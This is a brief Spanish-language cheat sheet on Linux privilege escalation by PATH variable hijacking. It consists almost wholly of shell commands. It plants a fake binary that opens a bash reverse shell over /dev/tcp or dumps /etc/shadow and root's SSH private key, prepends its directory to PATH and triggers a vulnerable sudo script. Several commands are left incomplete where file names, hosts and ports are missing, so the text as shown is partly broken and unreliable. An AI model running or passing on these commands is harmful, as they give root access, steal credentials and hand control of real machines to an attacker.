# PATH Variable Creación de directorio de trabajo. ```bash cd ~ mkdir temp cd temp ``` Creación de binario que suplantará el binario original y asignación de sus privilegios. ```bash # opción 1: shell echo "/bin/bash" > echo "/bin/bash -c 'bash -i >& /dev/tcp// 0>&1'" > # opción 2: lectura de archivo echo "/bin/bash -c 'cat // > /home//temp/'" > echo "/bin/bash -c 'cat /etc/shadow > /home//temp/shadow'" > echo "/bin/bash -c 'cat /root/.ssh/id_rsa > /home//temp/id_rsa'" > # asignación de privilegios al binario chmod 777 ``` Incorporación de ruta a variable PATH. ```bash echo $PATH export PATH=/home//temp:$PATH echo $PATH ``` Ejecución de script o binario vulnerable. ```bash sudo //